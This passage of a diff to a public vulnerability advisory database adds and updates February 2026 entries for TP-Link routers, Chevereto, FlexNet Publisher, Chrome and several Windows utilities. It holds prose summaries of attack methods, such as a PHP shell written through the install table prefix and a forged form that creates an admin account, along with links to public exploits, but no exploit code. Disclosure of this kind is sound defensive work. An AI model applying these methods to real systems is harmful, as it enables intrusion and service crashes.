"modified": "2026-02-03T21:31:50Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:50Z", "aliases": [ "CVE-2025-58077" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code\n\nvia a specially crafted set of network packets containing an excessive number of host entries\n\nThis issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-j3r9-x7xr-wvfg/GHSA-j3r9-x7xr-wvfg.json b/advisories/unreviewed/2026/02/GHSA-j3r9-x7xr-wvfg/GHSA-j3r9-x7xr-wvfg.json index 3539c3867dd45..fdde2c30268f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-j3r9-x7xr-wvfg/GHSA-j3r9-x7xr-wvfg.json +++ b/advisories/unreviewed/2026/02/GHSA-j3r9-x7xr-wvfg/GHSA-j3r9-x7xr-wvfg.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-125", "CWE-126" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-j4g3-xg56-p22g/GHSA-j4g3-xg56-p22g.json b/advisories/unreviewed/2026/02/GHSA-j4g3-xg56-p22g/GHSA-j4g3-xg56-p22g.json new file mode 100644 index 0000000000000..ff4e45c901bd6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j4g3-xg56-p22g/GHSA-j4g3-xg56-p22g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j4g3-xg56-p22g", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37191" + ], + "details": "Top Password Software Dialup Password Recovery 1.30 contains a denial of service vulnerability that allows attackers to crash the application by overflowing input fields. Attackers can trigger the vulnerability by inserting a large 5000-character payload into the User Name and Registration Code input fields.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37191" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47907" + }, + { + "type": "WEB", + "url": "https://www.top-password.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/top-password-software-dialup-password-recovery-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jm8f-9g3r-g5w9/GHSA-jm8f-9g3r-g5w9.json b/advisories/unreviewed/2026/02/GHSA-jm8f-9g3r-g5w9/GHSA-jm8f-9g3r-g5w9.json index 0c8a833360e18..482ac067347ed 100644 --- a/advisories/unreviewed/2026/02/GHSA-jm8f-9g3r-g5w9/GHSA-jm8f-9g3r-g5w9.json +++ b/advisories/unreviewed/2026/02/GHSA-jm8f-9g3r-g5w9/GHSA-jm8f-9g3r-g5w9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jm8f-9g3r-g5w9", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-62405" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet containing a field whose length exceeds the maximum expected value.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-jrmw-6fvh-x39j/GHSA-jrmw-6fvh-x39j.json b/advisories/unreviewed/2026/02/GHSA-jrmw-6fvh-x39j/GHSA-jrmw-6fvh-x39j.json index d6847a1b27e20..c04e4211447a6 100644 --- a/advisories/unreviewed/2026/02/GHSA-jrmw-6fvh-x39j/GHSA-jrmw-6fvh-x39j.json +++ b/advisories/unreviewed/2026/02/GHSA-jrmw-6fvh-x39j/GHSA-jrmw-6fvh-x39j.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-jxfc-7j9j-8gg7/GHSA-jxfc-7j9j-8gg7.json b/advisories/unreviewed/2026/02/GHSA-jxfc-7j9j-8gg7/GHSA-jxfc-7j9j-8gg7.json new file mode 100644 index 0000000000000..d2ae2aff45e26 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxfc-7j9j-8gg7/GHSA-jxfc-7j9j-8gg7.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxfc-7j9j-8gg7", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37186" + ], + "details": "Chevereto 3.13.4 Core contains a remote code execution vulnerability that allows attackers to inject malicious code during database configuration installation. Attackers can manipulate the database table prefix parameter to write a PHP shell file and execute arbitrary system commands through a crafted POST request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37186" + }, + { + "type": "WEB", + "url": "https://chevereto.com" + }, + { + "type": "WEB", + "url": "https://github.com/Chevereto/Chevereto-Free/releases" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47903" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/chevereto-core-remote-code-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m6gh-m58m-pj6h/GHSA-m6gh-m58m-pj6h.json b/advisories/unreviewed/2026/02/GHSA-m6gh-m58m-pj6h/GHSA-m6gh-m58m-pj6h.json new file mode 100644 index 0000000000000..cb541b7e3179e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m6gh-m58m-pj6h/GHSA-m6gh-m58m-pj6h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m6gh-m58m-pj6h", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37181" + ], + "details": "Torrent FLV Converter 1.51 Build 117 contains a stack overflow vulnerability that allows attackers to overwrite Structured Exception Handler (SEH) through a malicious registration code input. Attackers can craft a payload with specific offsets and partial SEH overwrite techniques to potentially execute arbitrary code on vulnerable Windows 32-bit systems.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37181" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47938" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/torrent-flv-converter-build-stack-oveflow-seh-partial-overwrite" + }, + { + "type": "WEB", + "url": "http://www.torrentrockyou.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json new file mode 100644 index 0000000000000..6f0497ef22ac3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7rx-q9f3-3p96", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2026-2314" + ], + "details": "Heap buffer overflow in Codecs in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2314" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/478560268" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m8px-gwxq-5mx8/GHSA-m8px-gwxq-5mx8.json b/advisories/unreviewed/2026/02/GHSA-m8px-gwxq-5mx8/GHSA-m8px-gwxq-5mx8.json index 333d044efba6e..c52629799b273 100644 --- a/advisories/unreviewed/2026/02/GHSA-m8px-gwxq-5mx8/GHSA-m8px-gwxq-5mx8.json +++ b/advisories/unreviewed/2026/02/GHSA-m8px-gwxq-5mx8/GHSA-m8px-gwxq-5mx8.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m8px-gwxq-5mx8", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-62404" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet whose length exceeds the maximum expected value.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-mh97-cxwp-x3wq/GHSA-mh97-cxwp-x3wq.json b/advisories/unreviewed/2026/02/GHSA-mh97-cxwp-x3wq/GHSA-mh97-cxwp-x3wq.json new file mode 100644 index 0000000000000..62084590d29eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mh97-cxwp-x3wq/GHSA-mh97-cxwp-x3wq.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mh97-cxwp-x3wq", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37187" + ], + "details": "SpotDialup 1.6.7 contains a denial of service vulnerability in the registration name input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37187" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47904" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotdialup-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mm49-f397-87mj/GHSA-mm49-f397-87mj.json b/advisories/unreviewed/2026/02/GHSA-mm49-f397-87mj/GHSA-mm49-f397-87mj.json new file mode 100644 index 0000000000000..6f61bda28a881 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mm49-f397-87mj/GHSA-mm49-f397-87mj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mm49-f397-87mj", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37204" + ], + "details": "RemShutdown 2.9.0.0 contains a denial of service vulnerability in its registration key input that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the registration key field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37204" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47863" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/remshutdown-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mqpv-gcv6-r5w9/GHSA-mqpv-gcv6-r5w9.json b/advisories/unreviewed/2026/02/GHSA-mqpv-gcv6-r5w9/GHSA-mqpv-gcv6-r5w9.json new file mode 100644 index 0000000000000..b714379ad882d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mqpv-gcv6-r5w9/GHSA-mqpv-gcv6-r5w9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqpv-gcv6-r5w9", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37200" + ], + "details": "NetShareWatcher 1.5.8.0 contains a buffer overflow vulnerability in the registration key input that allows attackers to crash the application by supplying oversized input. Attackers can generate a 1000-character payload and paste it into the registration key field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37200" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47860" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/netsharewatcher-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json b/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json new file mode 100644 index 0000000000000..d0e891bea5843 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw3g-2cmq-pj57", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2024-26480" + ], + "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the admin parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26480" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc/tree/main/CVE-2024-26480" + }, + { + "type": "WEB", + "url": "https://github.com/statping-ng/statping-ng" + }, + { + "type": "WEB", + "url": "https://statping-ng.github.io" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T20:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p32m-p89x-93gw/GHSA-p32m-p89x-93gw.json b/advisories/unreviewed/2026/02/GHSA-p32m-p89x-93gw/GHSA-p32m-p89x-93gw.json new file mode 100644 index 0000000000000..789158f19a82e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p32m-p89x-93gw/GHSA-p32m-p89x-93gw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p32m-p89x-93gw", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2019-25313" + ], + "details": "FlexNet Publisher 11.12.1 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. Attackers can craft a malicious HTML form to trick authenticated users into submitting a request that creates a new local admin account with a predefined password.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25313" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47986" + }, + { + "type": "WEB", + "url": "https://www.flexerasoftware.com" + }, + { + "type": "WEB", + "url": "https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/flexnet-publisher-cross-site-request-forgery-add-local-admin" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p3cm-cp3w-xm62/GHSA-p3cm-cp3w-xm62.json b/advisories/unreviewed/2026/02/GHSA-p3cm-cp3w-xm62/GHSA-p3cm-cp3w-xm62.json new file mode 100644 index 0000000000000..c0fba7a8e4641 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p3cm-cp3w-xm62/GHSA-p3cm-cp3w-xm62.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3cm-cp3w-xm62", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37205" + ], + "details": "RemShutdown 2.9.0.0 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the 'Name' registration field. Attackers can generate a 1000-character buffer payload and paste it into the registration name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37205" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47865" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/remshutdown-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json b/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json index db710aacbb106..55ec6a360ba64 100644 --- a/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json +++ b/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p866-9g89-mc5v", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-11T21:30:39Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-52868" ], "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json b/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json index 18a3e2baf6064..fddf048bfea40 100644 --- a/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json +++ b/advisories/unreviewed/2026/02/GHSA-pc84-8mjq-pcg8/GHSA-pc84-8mjq-pcg8.json @@ -30,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-863" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json b/advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json new file mode 100644 index 0000000000000..e3c436cdadc36 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf56-pmmh-5pxf", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37188" + ], + "details": "SpotOutlook 1.2.6 contains a denial of service vulnerability in the registration name input field that allows attackers to crash the application. Attackers can overwrite the buffer by pasting 1000 'A' characters into the 'Name' field, causing the application to become unresponsive.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37188" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47906" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotoutlook-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json b/advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json new file mode 100644 index 0000000000000..f7c37a0cf6c3f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmq3-mh37-3fc8", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37203" + ], + "details": "Office Product Key Finder 1.5.4 contains a denial of service vulnerability that allows attackers to crash the application by manipulating the registration code input. Attackers can create a specially crafted text file and paste it into the 'Name and Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": 